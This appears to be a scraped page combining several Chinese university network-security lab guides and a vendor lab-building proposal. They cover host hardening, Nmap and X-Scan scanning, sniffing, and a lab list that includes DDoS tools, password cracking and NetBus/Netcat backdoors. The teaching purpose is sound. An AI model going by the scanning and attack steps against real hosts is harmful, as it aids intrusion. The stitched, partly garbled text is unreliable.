3.禁用NetBIOS 主机A通过NetBIOS获取主机B信息,在命令行下执行如下命令: nbtstat –A 100.10.1.2 出现提示:Host not found 4.关闭445端口 (1)验证445端口是否开启 主机B在命令行中输入如下命令:netstat -an 查看到445端口处于Listening: (2)若主机不需要文件共享服务,可以通过修改注册表来屏蔽445端口 主机B执行如下命令:netstat -an 此时445端口未开启 5.禁止Telnet服务。 主机A重新telnet 主机B,出现提示 6.禁止ftp服务 主机B查看21端口是否关闭,在命令行下执行如下命令: netstat –an 主机B的21端口已关闭 主机A通过ftp访问主机B 提示无法与服务器建立连接 7.修改存在弱口令账号:net user test jlcssadmin 三.加固测试 (1)主机A使用X-Scan再次对主机B进行扫描,根据本次检测报告,对比第一次生成的 Linux主机加固 一.使用xinetd实施主机访问控制 1.telnet服务的参数配置 (1)telnet远程登录同组主机(用户名guest,口令guestpass),确定登录成功。 (2)查看本机网络监听状态,输入命令netstat -natp。回答下列问题: telnet监听端口:23 telnet服务守护进程名:xinetd (3)使用vim编辑器打开/etc/xinetd.d/telnet文件,解释telnet服务配置项,并填写表12-2-3。

网络安全课程实验指导书

.. 网络安全课程实验安排及指导书 2009-10-21

实验安排1、推荐必做实验 网络扫描 计算机病毒及恶意代码 防火墙实验 入侵检测系统 2、推荐选作实验 VPN配置 证书的申请和使用 windows安全配置实验

实验一:网络扫描实验 【实验目的】 了解扫描的基本原理,掌握基本方法,最终巩固主机安全 【实验内容】 1、学习使用Nmap的使用方法 2、学习使用漏洞扫描工具 【实验环境】 1、硬件PC机一台。 2、系统配置:操作系统windows XP以上。 【实验步骤】 1、端口扫描 1)解压并安装ipscan15.zip,扫描本局域网内的主机 2)解压nmap-4.00-win32.zip,安装WinPcap 运行cmd.exe,熟悉nmap命令(详见“Nmap详解.mht”)。 3)试图做以下扫描: 扫描局域网内存活主机, 扫描某一台主机或某一个网段的开放端口 扫描目标主机的操作系统 试图使用Nmap的其他扫描方式,伪源地址、隐蔽扫描等 2、漏洞扫描 解压X-Scan-v3.3-cn.rar,运行程序xscan_gui.exe,将所有模块选择扫描,扫描本机,或局域网内某一台主机的漏洞 【实验报告】 1、说明程序设计原理。 2、提交运行测试结果。 【实验背景知识】 1、扫描及漏洞扫描原理见第四章黑客攻击技术.ppt 2、NMAP使用方法 扫描器是帮助你了解自己系统的绝佳助手。象Windows 2K/XP这样复杂的操作系统支持应用软件打开数百个端口与其他客户程序或服务器通信,端口扫描是检测服务器上运行了哪些服务和应用、向Internet或其他网络开放了哪些联系通道的一种办法,不仅速度快,而且效果也很不错。

网络安全实验室方案书.doc

网络安全实验室方案书 一、认证课程与学校网络安全实验室建立的关系: 学校建立网络安全实验室的同时,即可引进TCSE课程,实验室与网络安全相关课程紧密结合,构建完善的网络安全教学体系。 趋势科技网络安全实验室参照学校网络专业的建设要求,结合学校认同的趋势科技TCSP-TCSE认证课程体系的专业教学要求,严格把关,层层审核,使用我们公司的最新硬件设备及软件产品来搭建而成。认证课程方案授权范围内包含我们的专业实验设备(具体产品可根据实际需要调节)。 若学校有一定的网络安全实验室建设需要,完整的趋势科技实验室设备随时恭候您的选购,并在专业领域权威性的技术带领下,提供学校一套完善而优秀的实验课程认证体系,附赠免费的全套技术支持。倘若学校有其他实验室教学要求没有采纳我们整体TCSP-TCSER认证课程体系,也可以单独采购部分硬件设备。 二、搭建网络实验室的重要性 1、实际的动手操作能力 随着就业竞争力的不断加大,各高校不断加强学生的专业知识训练。对于计算机专业的学生,他们更需要“强理论知识+动手实践”的训练方式,单一的理论知识已不足已他们在职场上占据竞争优势。现在有的培训机构由于没有整体的教学实验环境或实验设备不足,学生毕业后匆匆来到相关企业实习,发现“信息系统”早已演变为企业的命脉,这时他们正想投身回报社会,不巧被高级网管叫“停”,由于信息的安全性和敏感性,网络系统通常有层层密码保护,不仅企业内部的一般网管无法进入运行中的重要系统,外来实习人员更无法接触到运行中的关键设备和整个网络系统的核心技术。正常运行中的网络系统不可能让实习生当成训练场,结局自然就只能远远看着机房……为了扭转这种局势,高校必须配备同比企业的项目和工程的实验环境,使学生有充分动手的机会,占据就业竞争优势。 2、课程与网络安全实验室的紧密结合 趋势科技设计的网络环境中体现了防病毒体系的完整性,分别从网关、网络层、服务器和客户端多层次部署了病毒安全防御产品,从病毒防御架构上给予学生一个完整的防御体系概念,在课程当中也将结合这些产品进行病毒实验。 趋势科技从企业实际角度出发,根据学校的情况为学校推荐了一些软硬件产品建立网络安全实验室,实验室中可以进行基本的网络安全环境搭建、设置与部署,课程与网络安全实验室紧密结合。 3、提升学校的教学水平与专业影响 引入趋势TCSE网络安全实验室,可以举办面向本校学生和外校学生为培训对象的短期培训班,既增

网络安全实训指导书

常州轻工职业技术学院 实践指导书 实践项目网络安全技术实训 指导教师胡江 班级 学年学期 实践指导书

实训一嗅探器的窃听与防范 一、实训目的和要求 通过练习使用Netmon嗅探器捕获网络中用户登录信息;理解嗅探器工作的原理及其实施过程;掌握防范网络窃听的措施。 二、实训环境 (1)局域网 (2)Netmon (3)Web服务器 三、原理 1、什么是嗅探器,网络嗅探工作原理 sniffer 嗅探器可被理解为一种安装在计算机上的窃听设备。它可以用来窃听计算机在网络上所产生的众多的信息。 在使用集线器的以太网中,数据的传输是基于“共享”原理的,所有的同一网段范围内的计算机共同接收同样的数据包。这意味着计算机之间的通信都是透明的。网卡工作在正常模式时将屏蔽掉和自己无关的网络信息。事实上是忽略掉了与自身MAC地址不符合的信息。 嗅探程序则是利用以太网的特点,将设备网卡设置为“混杂模式”,从而能够接受到整个以太网内的网络数据信息了。 在使用交换机的以太网中,Sniffer是利用arp欺骗的所谓中间介入攻击的技术,诱骗网络上的工作站先把数据包传到Sniffer所在的网卡,再传给目标工作站。 2、什么是VPN? VPN(Virtual Private Network,虚拟专用网)是近年来随着Internet的广泛应用而迅速发展起来的一种新技术,实现在公用网络上构建私人专用网络。“虚拟”主要是指这种网络是一种逻辑上的网络。 3、什么是IPSec协议,它又哪些协议组成 IPSec是一个第三层VPN协议标准,它支持信息通过IP公网的安全传输。IPSec可有效保护IP数据报的安全,所采取的具体保护形式包括:访问控制、数据源验证、无连接数据的完整性验证、数据内容的机密性保护、抗重放保护等。 IPSec主要由AH(认证头)协议、ESP(封装安全载荷)协议及负责密钥管理的IKE(因特网密钥交换)协议组成,各协议之间的关系如图所示。 四、实验内容和步骤 1、编写用户登陆的ASP程序,配置Web站点 1)编写index.htm New Page 1

网络安全攻防实验室实施方案

网络安全攻防实验室 建设方案 XXXX信息科学与工程学院 2020/2/28

目录 第一章网络安全人才需求 (3) 1.1网络安全现状 (3) 1.2国家正式颁布五级安全等级保护制度 (3) 1.3网络安全技术人才需求猛增 (4) 第二章网络安全技术教学存在的问题 (4) 2.1网络安全实验室的建设误区 (4) 2.2缺乏网络安全的师资力量 (4) 2.3缺乏实用性强的安全教材 (5) 第三章安全攻防实验室特点 (5) 3.1安全攻防实验室简介 (5) 第四章安全攻防实验室方案 (6) 4.1安全攻防实验室设备选型 (6) 4.1.1 传统安全设备 (6) 4.1.2 安全沙盒——使实验室具有攻防教学功能的独特产品 (6) 4.2安全攻防实验室拓扑图 (8) 4.3安全攻防实验室课程体系 (9) 4.3.1 初级DCNSA网络安全管理员课程 (9) 4.3.2 中级DCNSE网络安全工程师课程 (10) 4.4高级安全攻防实验室实验项目 (12) 4.4.1基本实验 (12) 4.4.1扩展实验 (14) 第七章网络实验室布局设计 (25) 7.1 实验室布局平面图 (25) 7.2 实验室布局效果图 (25) 7.3 机柜摆放位置的选择 (26)

第一章网络安全人才需求 1.1网络安全现状 信息技术飞速发展,各行各业对信息系统的依赖程度越来越高,建立持续、稳定、安全的网络是保障用户业务发展的前提。 近年来,安全问题却日益严重:病毒、木马、黑客攻击、网络钓鱼、DDOS 等安全威胁层出不穷,而且技术越来越复杂,病毒、木马及黑客技术等融合造成了网络安全的巨大危机。 用户都已经认识到了安全的重要性。纷纷采用防火墙、加密、身份认证、访问控制,备份等保护手段来保护信息系统的安全。 但是网络安全的技术支持以及安全管理人才极度缺乏。 1.2国家正式颁布五级安全等级保护制度 2007年7月24日,公安部、国家保密局、国家密码管理局、国务院信息工作办公室正式上线颁布了信息安全等级保护规定,信息安全等级保护管理办法及实施指南,颁布了《信息安全等级保护管理办法》、《信息系统安全等级保护定级指南》、《信息安全技术信息系统安全等级保护实施指南》、《信息安全技术信息系统安全等级保护基本要求》等办法。 办法明确规定,信息系统的安全保护等级分为五级,不同等级的信息系统应具备的基本安全保护能力如下: 第一级安全保护能力:应能够防护系统免受来自个人的、拥有很少资源的威胁源发起的恶意攻击、一般的自然灾难、以及其他相当危害程度的威胁所造成的关键资源损害,在系统遭到损害后,能够恢复部分功能。 第二级安全保护能力:应能够防护系统免受来自外部小型组织的、拥有少量资源的威胁源发起的恶意攻击、一般的自然灾难、以及其他相当危害程度的威胁所造成的重要资源损害,能够发现重要的安全漏洞和安全事件,在系统遭到损害后,能够在一段时间内恢复部分功能。 第三级安全保护能力:应能够在统一安全策略下防护系统免受来自外部有组织的团体、拥有较为丰富资源的威胁源发起的恶意攻击、较为严重的自然灾难、以及其他相当危害程度的威胁所造成的主要资源损害,能够发现安全漏洞和安全事件,在系统遭到损害后,能够较快恢复绝大部分功能。 第四级安全保护能力:应能够在统一安全策略下防护系统免受来自国家级别的、敌对组织的、拥有丰富资源的威胁源发起的恶意攻击、严重的自然灾难、以及其他相当危害程度

网络安全实验指导

目录 网络安全与防火墙实验篇 实验一:查阅Linux 缺省的存取控制权限 实验二:创建Apache 服务器下的访问控制列表 实验三:使用PGP 创建密钥对 实验四:在NT 下导出PGP 公钥及对签名 实验五:NT 下PGP 使密钥对加密、解密信息 实验六:用PGP 加密和解密文件 实验七:使用MD5sum 创建HASH 校验和 实验八:PGP 使用实现VPN 的实施 实验九:在Linux 下用gnupg 工具实现加密 实验十:使用sniffer 捕获加密包和非加密包 实验十一:在IIS 中实现SSL 实验十二:使用NAT 进行蛮力攻击 实验十三:发送伪造的E-mail 实验十四:Tribe Flood Network(TFN)攻击 实验十五:使用单用户模式登录Linux 实验十六:利用Linux 启动盘更改Windows NT 密码 实验十七:在Windows NT 下关闭端口 实验十八:使用plisten 监听端口 实验十九:在NT 下使用NC(Netcat)开放后门端口 实验二十:在IIS 中配置安全的Web 站点 实验二十一:在IIS 中配置安全的FTP 服务 实验二十二:配置简单的网络检测 实验二十三:用Winroute 创建包过滤规则 实验二十四:使用WinRoute 过滤HTTP 访问 实验二十五:用WinRoute 配置FTP 过滤 操作系统实验篇 实验一:Red Button 工具探测NT 管理员帐号及共享 实验二:帐号锁定策略与暴力攻击 实验三:强制使用强壮的密码 实验四:UNIX 环境下密码时效的及PATH 的重要性 实验五:键盘记录程序的潜在危险 实验六:使用WebTrends Security Analyzer 进行安全评估 实验七:识别UNIX 下―r‖系列程序的不安全因素 实验八:在NT 下卸载和删除一些不必要的服务 实验九:更改NT 注册表来增强系统的安全性 实验十:保护FTP、TELNET 服务以及TCPWra 九:在Linux 下用gnupg 工具实现加密安全审计,攻击和威胁分析实验篇 实验一:使用tracert 命令检测路由和拓扑结构信息 实验二:使用WS_ping propack 进行网络检测和扫描 实验三:从SNMP 中获取信息 实验四:在Linux 下使用Nmap 检测端口 实验五:使用ISS internet SCanner 进行网络检测和分析 实验六:分析SYN Flood 攻击原理 实验七:分析Smurf 攻击原理 实验八:使用L0phtCrack 破解Windows NT 密码 实验九:使用John the Ripper 破解Linux 密码 实验十:使用NetBus 进行主机控制 实验十一:分析NetBus 会话端口 实验十二:使用NetBus 进行远程控制 实验十三:使用session wall 进行实时安全控制 实验十四:用session wall 监视主机活动 实验十五:在session wall 中创建,设置,编辑审计规则 实验十六:审计windows nt 引导与登录 实验十七:激活,分析windows nt 文件夹审计 实验十八:使用Linux 审计工具

网络安全实验

石河子大学信息科学与技术学院 网络安全课程实验 实验名称:使用任选工具进行网络检测与扫描 学生姓名:刘金红 学号:05 学院:信息科学与技术学院 专业年级:计算机科学与技术专业2012级 指导教师:曹传东老师 完成日期: 目录 1 实验环境 .......................................................................................................错误!未定义书签。 2 实验目的 .......................................................................................................错误!未定义书签。

3 实验步骤 .......................................................................................................错误!未定义书签。 4 实验内容 .......................................................................................................错误!未定义书签。 DOS窗口中常用网络命令的操作使用及IPCS攻击实践.....................错误!未定义书签。 DOS窗口中ping 命令及其常见带参数子命令的用法实践......错误!未定义书签。 DOS窗口中IPconfig 命令及其常见带参数子命令的用法实践 ..错误!未定义书签。 DOS窗口中nslookup命令及其常见带参数子命令的用法实践 .错误!未定义书签。 DOS窗口中netstat命令及其常见带参数子命令的用法实践.....错误!未定义书签。 DOS窗口中arp命令及其常见带参数子命令的用法实践...........错误!未定义书签。 DOS窗口中route命令及其常见带参数子命令的用法实践 .......错误!未定义书签。 DOS窗口中tracert命令及其常见带参数子命令的用法实践 .....错误!未定义书签。 DOS窗口中ftp命令及其常见带参数子命令的用法实践 ...........错误!未定义书签。 DOS窗口中telnet命令及其常见带参数子命令的用法实践 ......错误!未定义书签。 DOS窗口中sc命令及其常见带参数子命令的用法实践.............错误!未定义书签。 DOS窗口中nbtstat命令及其常见带参数子命令的用法实践 ....错误!未定义书签。 DOS窗口中net命令及其常见带参数子命令的用法实践...........错误!未定义书签。 DOS窗口中at命令及其常见带参数子命令的用法实践.............错误!未定义书签。 使用课本第四章各案例中介绍的工具软件进行网络信息收集和扫描检测错误!未定义书签。 在虚拟机系统Window200x中使用GetNTuser工具扫描本机系统上存在的用户名,并猜解其中具有空密码和弱口令的用户;在该软件中使用自定义字典文件穷举 猜解某个用户的口令(爆破);......................................................错误!未定义书签。 使用Port Scan 工具软件进行对某目标机开放端口的扫描;....错误!未定义书签。 在虚拟机系统中使用Shed 工具软件扫描某个目标主机的共享目录信息;错误! 未定义书签。 编译执行课本中案例4-4介绍的代码,并利用抓包工具进行验证;错误!未定义书 签。 使用漏洞扫描工具X-Scan对指定IP 地址段或单机进行全面的安全漏洞扫描和检 测;....................................................................................................错误!未定义书签。 使用嗅探工具Win Sniffer 监听客户端登陆FTP服务器的用户和密码信息;错误! 未定义书签。 使用自选的任一款扫描工具进行网络攻击前的信息收集 ....................错误!未定义书签。 使用CIS工具对本机系统进行安全风险评估...............................错误!未定义书签。 使用Superscan扫描工具实现秘密端口扫描 ...............................错误!未定义书签。 实验一:使用任选工具软件进行网络检测和扫描 1 实验环境 1台带有活动网络连接(插有网卡且工作正常)、安装有VMware虚拟机软件的PC机,其中主机环境配置如表1-1所示: 表1-1 本机环境:主机操作系统的配置(作为客户机端)

相关文档
最新文档